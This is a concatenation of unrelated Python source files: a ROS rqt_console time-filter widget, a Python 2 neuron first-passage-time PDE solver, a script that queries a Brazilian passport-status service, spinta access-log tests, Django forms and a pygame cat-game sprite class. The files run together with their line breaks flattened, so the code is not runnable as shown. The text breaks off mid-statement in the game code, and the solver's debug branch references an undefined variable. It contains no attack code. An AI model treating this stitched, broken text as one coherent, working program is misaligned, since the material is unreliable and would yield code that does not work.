from datetime import datetime import os import rospkg from python_qt_binding import loadUi from python_qt_binding.QtCore import QDateTime from python_qt_binding.QtWidgets import QWidget class TimeFilterWidget(QWidget): def __init__(self, parentfilter, rospack, time_range_provider): """ Widget for displaying interactive data related to time filtering. :param parentfilter: buddy filter were data is stored, ''TimeFilter'' :param display_list_args: single element list containing one tuple with the min and max time to be displayed, ''list of tuple'' """ super(TimeFilterWidget, self).__init__() ui_file = os.path.join( rospack.get_path('rqt_console'), 'resource/filters', 'time_filter_widget.ui') loadUi(ui_file, self) self.setObjectName('TimeFilterWidget') self._parentfilter = parentfilter # When data is changed it is stored in the parent filter self.start_datetime.dateTimeChanged[QDateTime].connect(self.handle_start_changed) self.stop_datetime.dateTimeChanged[QDateTime].connect(self.handle_stop_changed) self.stop_enabled_check_box.clicked[bool].connect(self.handle_stop_enabled_changed) # Times are passed in unixtimestamp '.' decimal fraction of a second mintime, maxtime = time_range_provider() if mintime != -1: mintime = str(mintime).split('.') maxtime = str(maxtime).split('.') time = QDateTime() time.setTime_t(int(mintime[0])) mintime = time.addMSecs(int(str(mintime[1]).zfill(9)[:3])) self.start_datetime.setDateTime(mintime) time.setTime_t(int(maxtime[0])) maxtime = time.addMSecs(int(str(maxtime[1]).zfill(9)[:3])) self.stop_datetime.setDateTime(maxtime) else: self.start_datetime.setDateTime(datetime.now()) self.stop_datetime.setDateTime(datetime.now()) def handle_start_changed(self, datetime_): self._parentfilter.set_start_time(datetime_) def handle_stop_changed(self, datetime_): self._parentfilter.set_stop_time(datetime_) def handle_stop_enabled_changed(self, checked): self._parentfilter.set_stop_time_enabled(checked) self.stop_datetime.setEnabled(checked) def repopulate(self): """ Stub function. If the widget had any dynamically adjustable data it would requery it in this function. """ pass def save_settings(self, settings): """ Saves the settings for this filter to an ini file. :param settings: used to write the settings to an ini file ''qt_gui.settings.Settings'' """ settings.set_value( 'start_time', self._parentfilter._start_time.toString('hh:mm:ss.zzz (yyyy-MM-dd)')) settings.set_value( 'stop_time', self._parentfilter._stop_time.toString('hh:mm:ss.zzz (yyyy-MM-dd)')) settings.set_value('stop_time_enabled', self._parentfilter._stop_time_enabled) def restore_settings(self, settings): """ Restores the settings for this filter from an ini file. 
:param settings: used to extract the settings from an ini file ''qt_gui.settings.Settings'' """ self.handle_stop_enabled_changed(settings.value('stop_time_enabled') in [True, 'true']) if settings.contains('start_time'): self.handle_start_changed( QDateTime.fromString(settings.value('start_time'), 'hh:mm:ss.zzz (yyyy-MM-dd)')) else: self.handle_start_changed(QDateTime(datetime.now())) if settings.contains('stop_time'): self.handle_stop_changed( QDateTime.fromString(settings.value('stop_time'), 'hh:mm:ss.zzz (yyyy-MM-dd)')) else: self.handle_stop_changed(QDateTime(datetime.now())) self.stop_datetime.setDateTime(self._parentfilter._stop_time) self.start_datetime.setDateTime(self._parentfilter._start_time) self.stop_enabled_check_box.setChecked(self._parentfilter._stop_time_enabled) tibrewalabhay/molif #!/usr/bin/env python #coding=utf-8 # Copyright 2008 Valentin 'esc' Haenel # # This program is free software. It comes without any warranty, to # the extent permitted by applicable law. You can redistribute it # and/or modify it under the terms of the Do What The Fuck You Want # To Public License, Version 2, as published by Sam Hocevar. See # http://sam.zoy.org/wtfpl/COPYING for more details. from util import * from model import * from integral import FirstPassageInt from numpy import diff, shape, ones, arange, concatenate from scipy import sparse, linsolve class pde_solver(object): def __init__(self,lif,W,V_lb,debug=False): """ compute the density evolution for a lif model Arguments: lif - and instance of lnlif W - the number of intervals to split lif.t_max into V_lb - the lower bound on the voltage discretization debug- when True will output lots of debugging lif provides most of the variables for this function. """ self.lif = lif self.W = W self.V_lb = V_lb self.debug = debug # Lambda is our tridiagonal matrix in each iteration step self.Lambda = sparse.lil_matrix((self.W-1,self.W-1)) # coefficients of the terms in the Fokker-Planck equation self.a = self.lif.sigma**2/2 self.c = self.lif.g self.b = 0 # length of time interval in discretization self.u = self.lif.dt # voltage upper bound self.V_max = self.lif.V_threshold; # voltage lower bound self.V_min = self.V_lb # voltage range self.V_range = self.V_max - self.V_min # lenth of a voltage interval self.w = self.V_range/self.W # mapping of possible values for voltage note: len(V_values) = W self.V_values = arange(self.V_min,self.V_max,self.w) if self.debug: print "V_values: " , self.V_values # this is the index of the value thats closest to V_reset self.V_reset_index = abs(self.V_values - lif.V_reset).argmin() if self.debug: print "V_reset_index" , self.V_reset_index # Lambda * chi = beta self.beta = zeros(W-1) def compute_product_fpt(self): """ compute the product of all fpts for all spike intervals this is the maximum likelihood """ print "computing fpt for all intervals, total: ", \ len(self.lif.spikes) likelihood = 1 for i in xrange(1,len(self.lif.spikes)): if i%10==0 : print "interval: " , i # for each ISI start = self.lif.spikes[i-1] end = self.lif.spikes[i] if self.debug : print "start: ", start print "end:" , end print "spike_times", self.lif.spikes P_vt = self.pde_interval(start,end) likelihood *= self.P_vt_to_fpt(P_vt)[-1] del P_vt return likelihood def P_vt_to_fpt(self,P_vt): """ turn the density evolution into an first passage time Differentiat w.r.t. time the integral w.r.t. 
Potential """ return concatenate(([0], diff(P_vt.sum(axis=0)) * -1.0)) #@print_timing def pde_interval(self, start, end): """ compute the density evolution for the given interval """ # length of the time interval U = end-start # final density matrix for this interval P_vt = zeros((self.W+1,U)) # set initial value if self.debug : print "W" , self.W print "U" , U print P_vt P_vt[self.V_reset_index,0] = 1 for t in xrange(U-1): # V_rest as defined by lif V_rest = self.lif.V_rest(start+t); # A B and C diagonals of Lambda A = zeros(self.W-2) B = zeros(self.W-1) C = zeros(self.W-2) # now we go and fill the matrix in a,b,c,u,w = self.a, self.b, self.c, self.u, self.w b_array = self.lif.g * (self.V_values[1:-1]/2 -V_rest) #here we scrapped the for loop, yes! #but scrapped readability, no! A[:] = -(2*a*u + b_array[:]*w*u) B[:] = ((4*a*u) - (2*c*w**2*u) + (4*w**2)) C[:]= -(2*a*u - b_array[:]*w*u) self.beta[1:-1] = (2*a*u + b_array[1:]*w*u) * P_vt[3:-1,t] + \ (-4*a*u + 2*c*w**2*u + 4*w**2) * P_vt[2:-2,t] + \ (2*a*u - b_array[:-1]*w*u) * P_vt[1:-3,t] # now we set the diagonals of the tridiagonal matrix self.Lambda.setdiag(A,1) self.Lambda.setdiag(B) self.Lambda.setdiag(C,-1) if self.debug: print "A :" , A print "B :" , B print "C :" , C print "Lambda: " , self.Lambda.todense() print "Lambda22: " , Lambda2.todense() print "beta: " , self.beta chi = linsolve.spsolve(self.Lambda,self.beta) if self.debug: print "chi:" , chi print "sumchi", chi.sum() P_vt[1:-1,t+1] = chi[:] if self.debug: print "P_vt: ", P_vt return P_vt @print_timing def compute_pde_fpt(): """ compute the first passage time using pde""" print "computing partial differential equation based first \ passage time now" lif = lif_setup() p = pde_solver(lif,500,-3.0,debug=False) P_vt = p.pde_interval(0,400) fpt = p.P_vt_to_fpt(P_vt) time = arange(len(fpt))*lif.dt return time, fpt/lif.dt def compute_integral_fpt(): """ compute the first passage time using pde""" print "computing partial differentail equation based first \ passage time now" lif = lif_setup() sigma = lif.sigma current = lif.stim[::5] g_cond = lif.g*ones(len(current)) v_thr = lif.V_threshold V_reset = lif.V_reset dt = lif.dt*5 fpt = FirstPassageInt(g_cond, sigma, current, v_thr, V_reset, dt) print lif.g, sigma, current, v_thr, V_reset time = arange(len(current))*dt return time, fpt if __name__ == '__main__': #compute_pde_fpt() compute_integral_fpt() run.py #!/usr/bin/env python3 """checka a porra toda""" from sys import argv from scrappy import check try: DEST = argv[3] PASSWD = argv[4] except IndexError: DEST = "0" PASSWD = "0" try: CPF = argv[1] PROTO = argv[2] URL = "https://servicos.dpf.gov.br/sinpa/consultarSituacaoSolicitacao.do\ ?dispatcher=consultarSituacaoSolicitacao&protocolo=" + PROTO + "&cpf=" + CPF + "\ &email1=&email2=&url=" check(URL, DEST, PASSWD) except IndexError: print("Usage %s CPF protocol [email passwd]", argv[0]) import json import pathlib import pytest from _pytest.capture import CaptureFixture from spinta.accesslog.file import FileAccessLog from spinta.components import Store from spinta.core.config import RawConfig from spinta.testing.client import create_test_client from spinta.testing.context import create_test_context def _upload_pdf(model, app): resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 data = resp.json() id_ = data['_id'] rev = data['_revision'] resp = app.put(f'/{model}/{id_}/pdf', data=b'BINARYDATA', headers={ 'revision': rev, 'content-type': 'application/pdf', 'content-disposition': 'attachment; 
filename="test.pdf"', }) assert resp.status_code == 200, resp.text return id_, rev, resp @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_post_accesslog(model, app, context): app.authmodel(model, ['insert']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201, resp.json() accesslog = context.get('accesslog.stream') assert len(accesslog) == 1 assert accesslog[-1] == { 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'method': 'POST', 'url': f'https://testserver/{model}', 'agent': 'testclient', 'rctype': 'application/json', 'format': 'json', 'action': 'insert', 'model': model, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_post_array_accesslog(model, app, context): app.authmodel(model, ['insert']) resp = app.post(f'/{model}', json={ 'status': '42', 'notes': [{ 'note': 'foo', }], }) assert resp.status_code == 201 accesslog = context.get('accesslog.stream') assert len(accesslog) == 1 assert accesslog[-1] == { 'method': 'POST', 'agent': 'testclient', 'rctype': 'application/json', 'format': 'json', 'action': 'insert', 'url': f'https://testserver/{model}', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_put_accesslog(model, app, context): app.authmodel(model, ['insert', 'update']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 data = resp.json() id_ = data['_id'] rev = data['_revision'] revision = data['_revision'] resp = app.put(f'/{model}/{id_}', json={ 'status': '314', '_revision': revision, }) assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'method': 'PUT', 'agent': 'testclient', 'rctype': 'application/json', 'format': 'json', 'action': 'update', 'url': f'https://testserver/{model}/{id_}', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'id': id_, 'rev': rev, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_pdf_put_accesslog(model, app, context): app.authmodel(model, ['insert', 'update', 'pdf_update']) id_, rev, resp = _upload_pdf(model, app) accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 # 2 accesses overall: POST and PUT assert accesslog[-1] == { 'action': 'update', 'agent': 'testclient', 'rctype': 'application/pdf', 'format': 'json', 'method': 'PUT', 'url': f'https://testserver/{model}/{id_}/pdf', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'prop': 'pdf', 'id': id_, 'rev': rev, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_patch_accesslog(model, app, context): app.authmodel(model, ['insert', 'patch']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 data = resp.json() id_ = data['_id'] rev = data['_revision'] resp = app.patch(f'/{model}/{id_}', json={ '_revision': rev, 'status': '13', }) assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'agent': 'testclient', 'rctype': 'application/json', 'format': 'json', 'action': 'patch', 'method': 'PATCH', 'url': f'https://testserver/{model}/{id_}', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': 
model, 'id': id_, 'rev': rev, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_get_accesslog(app, model, context): app.authmodel(model, ['insert', 'getone']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 data = resp.json() id_ = data['_id'] resp = app.get(f'/{model}/{id_}') assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'getone', 'method': 'GET', 'url': f'https://testserver/{model}/{id_}', 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'id': id_, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_get_array_accesslog(model, app, context): app.authmodel(model, ['insert', 'getone']) resp = app.post(f'/{model}', json={ 'status': '42', 'notes': [{ 'note': 'foo', }], }) assert resp.status_code == 201 data = resp.json() id_ = data['_id'] app.get(f'/{model}/{id_}') accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'getone', 'method': 'GET', 'url': f'https://testserver/{model}/{id_}', 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'id': id_, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_pdf_get_accesslog(model, app, context): app.authmodel(model, ['insert', 'update', 'pdf_update', 'pdf_getone']) id_, revision, resp = _upload_pdf(model, app) app.get(f'/{model}/{id_}/pdf') accesslog = context.get('accesslog.stream') assert len(accesslog) == 3 # 3 accesses overall: POST, PUT, GET assert accesslog[-1] == { 'format': 'json', 'agent': 'testclient', 'action': 'getone', 'method': 'GET', 'url': f'https://testserver/{model}/{id_}/pdf', 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'prop': 'pdf', 'id': id_, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_get_prop_accesslog(app, model, context): app.authmodel(model, ['insert', 'getone']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 data = resp.json() pk = data['_id'] resp = app.get(f'/{model}/{pk}/sync') assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'getone', 'method': 'GET', 'url': f'https://testserver/{model}/{pk}/sync', 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'prop': 'sync', 'id': pk, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_get_w_select_accesslog(app, model, context): app.authmodel(model, ['insert', 'getone']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 data = resp.json() pk = data['_id'] resp = app.get(f'/{model}/{pk}?select(status)') assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'getone', 'method': 'GET', 'url': f'https://testserver/{model}/{pk}?select(status)', 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'id': pk, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_getall_accesslog(app, model, context): app.authmodel(model, ['insert', 'getall']) resp = app.post(f'/{model}', json={'status': '42'}) assert 
resp.status_code == 201 resp = app.get(f'/{model}') assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'getall', 'method': 'GET', 'url': f'https://testserver/{model}', 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_getall_w_select_accesslog(app, model, context): app.authmodel(model, ['insert', 'getall', 'search']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 resp = app.get(f'/{model}?select(status)') assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'search', 'method': 'GET', 'url': f'https://testserver/{model}?select(status)', 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, } @pytest.mark.models( 'backends/postgres/report', ) def test_accesslog_file(model, postgresql, rc, request, tmpdir): logfile = pathlib.Path(tmpdir / 'accesslog.log') rc = rc.fork({ 'accesslog': { 'type': 'file', 'file': str(logfile), }, }) context = create_test_context(rc) request.addfinalizer(context.wipe_all) app = create_test_client(context) app.authmodel(model, ['insert']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 accesslog = [json.loads(line) for line in logfile.read_text().splitlines()] assert len(accesslog) == 1 assert accesslog[-1] == { 'agent': 'testclient', 'rctype': 'application/json', 'format': 'json', 'action': 'insert', 'method': 'POST', 'url': f'https://testserver/{model}', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, } @pytest.mark.models( 'backends/postgres/report', ) def test_accesslog_file_dev_null(model, postgresql, rc, request): rc = rc.fork({ 'accesslog': { 'type': 'file', 'file': '/dev/null', }, }) context = create_test_context(rc) request.addfinalizer(context.wipe_all) app = create_test_client(context) app.authmodel(model, ['insert']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 store: Store = context.get('store') assert isinstance(store.accesslog, FileAccessLog) assert store.accesslog.file is None @pytest.mark.models( 'backends/postgres/report', ) def test_accesslog_file_null(model, postgresql, rc, request): rc = rc.fork({ 'accesslog': { 'type': 'file', 'file': 'null', }, }) context = create_test_context(rc) request.addfinalizer(context.wipe_all) app = create_test_client(context) app.authmodel(model, ['insert']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 store: Store = context.get('store') assert isinstance(store.accesslog, FileAccessLog) assert store.accesslog.file is None @pytest.mark.models( 'backends/postgres/report', ) def test_accesslog_file_stdin( model: str, postgresql, rc: RawConfig, request, capsys: CaptureFixture, ): rc = rc.fork({ 'accesslog': { 'type': 'file', 'file': 'stdout', }, }) context = create_test_context(rc) request.addfinalizer(context.wipe_all) app = create_test_client(context) app.authmodel(model, ['insert']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 store: Store = context.get('store') assert isinstance(store.accesslog, FileAccessLog) cap = capsys.readouterr() accesslog = [ json.loads(line) for line in cap.out.splitlines() # Skip 
other lines from stdout that are not json if line.startswith('{') ] assert len(accesslog) == 1 assert accesslog[-1] == { 'action': 'insert', 'agent': 'testclient', 'client': 'test-client', 'format': 'json', 'method': 'POST', 'model': 'backends/postgres/report', 'rctype': 'application/json', 'time': accesslog[-1]['time'], 'txn': accesslog[-1]['txn'], 'url': 'https://testserver/backends/postgres/report' } @pytest.mark.models( 'backends/postgres/report', ) def test_accesslog_file_stderr( model: str, postgresql, rc: RawConfig, request, capsys: CaptureFixture, ): rc = rc.fork({ 'accesslog': { 'type': 'file', 'file': 'stderr', }, }) context = create_test_context(rc) request.addfinalizer(context.wipe_all) app = create_test_client(context) app.authmodel(model, ['insert']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 store: Store = context.get('store') assert isinstance(store.accesslog, FileAccessLog) cap = capsys.readouterr() accesslog = [ json.loads(line) for line in cap.err.splitlines() # Skip other lines from stdout that are not json if line.startswith('{') ] assert len(accesslog) == 1 assert accesslog[-1] == { 'action': 'insert', 'agent': 'testclient', 'client': 'test-client', 'format': 'json', 'method': 'POST', 'model': 'backends/postgres/report', 'rctype': 'application/json', 'time': accesslog[-1]['time'], 'txn': accesslog[-1]['txn'], 'url': 'https://testserver/backends/postgres/report' } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_delete_accesslog(model, app, context): app.authmodel(model, ['insert', 'delete']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 data = resp.json() id_ = data['_id'] resp = app.delete(f'/{model}/{id_}') assert resp.status_code == 204 assert resp.content == b'' accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'delete', 'method': 'DELETE', 'url': f'https://testserver/{model}/{id_}', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'id': data['_id'], } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_pdf_delete_accesslog(model, app, context): app.authmodel(model, ['insert', 'update', 'getone', 'pdf_getone', 'pdf_update', 'pdf_delete']) id_, rev, resp = _upload_pdf(model, app) resp = app.delete(f'/{model}/{id_}/pdf') assert resp.status_code == 204 assert resp.content == b'' accesslog = context.get('accesslog.stream') assert len(accesslog) == 3 # 3 accesses overall: POST, PUT, DELETE assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'delete', 'method': 'DELETE', 'url': f'https://testserver/{model}/{id_}/pdf', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'prop': 'pdf', 'id': id_, } def _get_object_rev(app, model: str, id_: str) -> str: resp = app.get(f'/{model}/{id_}') assert resp.status_code == 200 data = resp.json() return data['_revision'] @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_pdf_ref_update_accesslog(model, app, context, tmpdir): app.authmodel(model, ['insert', 'update', 'getone', 'pdf_getone', 'pdf_update', 'pdf_delete']) id_, rev, resp = _upload_pdf(model, app) image = pathlib.Path(tmpdir) / 'image.png' image.write_bytes(b'IMAGEDATA') rev = _get_object_rev(app, model, id_) resp = app.put(f'/{model}/{id_}/pdf:ref', json={ '_id': 'image.png', 
'_revision': rev }) assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 4 # 4 accesses overall: POST, PUT, GET, PUT assert accesslog[-1] == { 'agent': 'testclient', 'rctype': 'application/json', 'format': 'json', 'action': 'update', 'method': 'PUT', 'url': f'https://testserver/{model}/{id_}/pdf:ref', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'prop': 'pdf', 'id': id_, 'rev': rev, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_batch_write(model, app, context, tmpdir): ns = model[:-len('/report')] app.authmodel(ns, ['insert']) resp = app.post(f'/{ns}', json={ '_data': [ { '_op': 'insert', '_type': model, 'status': 'ok', }, ], }) resp.raise_for_status() accesslog = context.get('accesslog.stream') assert len(accesslog) == 1 assert accesslog[-1] == { 'agent': 'testclient', 'rctype': 'application/json', 'format': 'json', 'action': 'insert', 'method': 'POST', 'url': f'https://testserver/{ns}', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'ns': ns, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_stream_write(model, app, context, tmpdir): ns = model[:-len('/report')] app.authmodel(ns, ['insert']) headers = {'content-type': 'application/x-ndjson'} resp = app.post(f'/{ns}', headers=headers, data=json.dumps({ '_op': 'insert', '_type': model, 'status': 'ok', })) resp.raise_for_status() accesslog = context.get('accesslog.stream') assert len(accesslog) == 1 assert accesslog[-1] == { 'agent': 'testclient', 'rctype': 'application/x-ndjson', 'format': 'json', 'action': 'insert', 'method': 'POST', 'url': f'https://testserver/{ns}', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'ns': ns, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_ns_read(model, app, context, tmpdir): ns = model[:-len('/report')] app.authmodel(ns, ['getall']) resp = app.get(f'/{ns}/:ns/:all') assert resp.status_code == 200, resp.json() accesslog = context.get('accesslog.stream') assert len(accesslog) == 1 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'getall', 'method': 'GET', 'url': f'https://testserver/{ns}/:ns/:all', 'time': accesslog[-1]['time'], 'client': 'test-client', 'ns': ns, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_ns_read(model, app, context, tmpdir): ns = model[:-len('/report')] app.authmodel(ns, ['getall']) resp = app.get(f'/{ns}/:ns/:all/:format/csv') assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 1 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'csv', 'action': 'getall', 'method': 'GET', 'url': f'https://testserver/{ns}/:ns/:all/:format/csv', 'time': accesslog[-1]['time'], 'client': 'test-client', 'ns': ns, } T = int(input()) for i in range(T): R, S = input().split() R = int(R) S = list(S) for s in S: print(s*R, end="") print()coaches/forms.py0 from django import forms from .widgets import CustomClearableFileInput from .models import Coach, Comment class CoachForm(forms.ModelForm): class Meta: model = Coach fields = '__all__' image = forms.ImageField( label='Image', required=False, widget=CustomClearableFileInput) def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) for field_name, field in self.fields.items(): field.widget.attrs['class'] = 'border-black' class 
CommentForm(forms.ModelForm): class Meta: model = Comment fields = ( "comment", "stars", ) def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.fields["comment"].widget.attrs[ "placeholder"] = "Add a Comment here" cat.py0 import pygame, os from bagel import GhostBagel from bullet import Bullet from bullet import AlienBullet from wheat import Wheat pygame.init() class Cat(pygame.sprite.Sprite): paused = False cat = None move = True gameOver = False catNumber = None storedSpeed = 1 # Eating eat = False victim = None eatAnimationTime = 0 # Melon Stuff fired = False fireTimer = 0 shoot = None afterShot = 0 # Weenies! sp1 = False sp2 = False sp3 = False sp4 = False sp5 = False speed = 1 # Pizza .. cat? shield = None totalShield = None pizzaDown = False # Cage Stuff caged = False storedY = 0 targeted = False # Everything Stuff garlicStacks = 0 garlicTimer = 0 healthTick = 0 # Alien Stuff moveTimer = 120 def __init__(self,catType,health,x,y,image,image_eating,number): pygame.sprite.Sprite.__init__(self) self.health = health self.totalHealth = health self.image = image self.cat = image self.image_eating = image_eating self.catType = catType self.rect = self.image.get_rect() self.rect.x = x self.rect.y = y self.catNumber = number # dont put in init! self.mask = pygame.mask.from_surface(self.image) def update(self, paused): self.paused = paused if self.paused == False: if self.move == True: if self.catType != "alien_cat": self.rect.x -= self.speed else: self.moveTimer -= 1 if 0 < self.moveTimer <= 40: self.rect.x -= 1 self.moveTimer -= 1 if self.moveTimer <= 0: self.moveTimer = 120 if self.rect.x <= -100: self.kill() self.remove() if self.rect.x < 0: self.gameOver = True if self.garlicStacks != 0: self.garlicTimer += 1 if self.garlicTimer >= 60: #150 self.healthTick += 1 if self.healthTick == 20: if self.shield > 0: self.shield -= 1 else: self.health -= 1 elif self.healthTick == 40: if self.shield > 0: self.shield -= 1 else: self.health -= 1 self.garlicTimer = 0 self.healthTick = 0 def rainPizzas(self,pizza,allSprites,ghostBagelList,pizza_cat_ns,pizza_cat_eating_ns): #ns = no shield if self.shield <= 0: if self.pizzaDown == False: self.cat = pizza_cat_ns self.image_eating = pizza_cat_eating_ns flyingPizza = GhostBagel(self.rect.x,self.rect.y,pizza) flyingPizza.add(allSprites) flyingPizza.add(ghostBagelList) px = self.rect.x py = self.rect.y self.rect = self.image.get_rect() self.rect.x = px self.rect.y = py if self.eat == False: self.rect.x += 11 self.pizzaDown = True def eatEmCat(self,bagelList,emptyBList): if 10 <= self.eatAnimationTime <= 30: self.image = self.image_eating elif self.eatAnimationTime <= 10: self.image = self.cat elif self.eatAnimationTime >= 30: self.eatAnimationTime = 0 self.image = self.image_eating if self.victim != None and self.caged == False: self.eat = True self.move = False if self.victim.health <= 0 and self.victim.immune == False: self.victim = None self.eat = False self.move = True if self.eat == True and self.paused == False: if self.victim.immune == False: if self.catType != "ninja_cat": self.victim.health -= 1 else: self.victim.health -= 2 self.eatAnimationTime += 1 self.fired = False self.fireTimer = 0 self.shoot = None self.afterShot = 0 elif self.eat == False: self.eatAnimationTime = 0 def eatEmTacoCat(self,bagelList,emptyBList,ghostBagelList,allSprites,plain,poppy,wizard_bagel1,wizard_bagel2,wizard_bagel3,every,crais,mini_bagelsd2,toaster,toasted_mini): if self.victim != None and self.caged == False: self.eat = True self.move = False if 10 
<= self.eatAnimationTime <= 30: self.image = self.image_eating elif self.eatAnimationTime <= 10: self.image = self.cat elif self.eatAnimationTime >= 30: self.eatAnimationTime = 0 self.image = self.image_eating if self.eat == True and self.paused == False and self.caged == False: if self.victim.bagelType == "wheat" or self.victim.bagelType == "sesame" or self.victim.bagelType == "cow" or self.victim.bagelType == "multi": self.eatAnimationTime += 1 if self.victim.immune == False: self.victim.health -= 1 elif self.victim.bagelType == "plain" or self.victim.bagelType == "poppy" or self.victim.bagelType == "wizard" or self.victim.bagelType == "everything" or self.victim.bagelType == "crais" or self.victim.bagelType == "mini" or self.victim.bagelType == "toaster": if self.victim.bagelType == "plain": ghostBagel = GhostBagel(self.victim.rect.x,self.victim.rect.y,plain) ghostBagel.add(allSprites) ghostBagel.add(ghostBagelList) elif self.victim.bagelType == "poppy": ghostBagel = GhostBagel(self.victim.rect.x,self.victim.rect.y,poppy) ghostBagel.add(allSprites) ghostBagel.add(ghostBagelList) elif self.victim.bagelType == "wizard": if self.victim.level == 1: ghostBagel = GhostBagel(self.victim.rect.x,self.victim.rect.y,wizard_bagel1) ghostBagel.add(allSprites) ghostBagel.add(ghostBagelList) elif self.victim.level == 2: ghostBagel = GhostBagel(self.victim.rect.x,self.victim.rect.y,wizard_bagel2) ghostBagel.add(allSprites) ghostBagel.add(ghostBagelList) elif self.victim.level == 3: ghostBagel = GhostBagel(self.victim.rect.x,self.victim.rect.y,wizard_bagel3) ghostBagel.add(allSprites) ghostBagel.add(ghostBagelList) elif self.victim.bagelType == "everything": ghostBagel = GhostBagel(self.victim.rect.x,self.victim.rect.y,every) ghostBagel.add(allSprites) ghostBagel.add(ghostBagelList) elif self.victim.bagelType == "crais": ghostBagel = GhostBagel(self.victim.rect.x,self.victim.rect.y,crais) ghostBagel.add(allSprites) ghostBagel.add(ghostBagelList) elif self.victim.bagelType == "mini": ghostBagel1 = GhostBagel(self.victim.rect.x + 2,self.victim.rect.y + 1,mini_bagelsd2) ghostBagel1.add(allSprites) ghostBagel1.add(ghostBagelList) ghostBagel2 = GhostBagel(self.victim.rect.x + 8,self.victim.rect.y + 29,mini_bagelsd2) ghostBagel2.add(allSprites) ghostBagel2.add(ghostBagelList) ghostBagel3 = 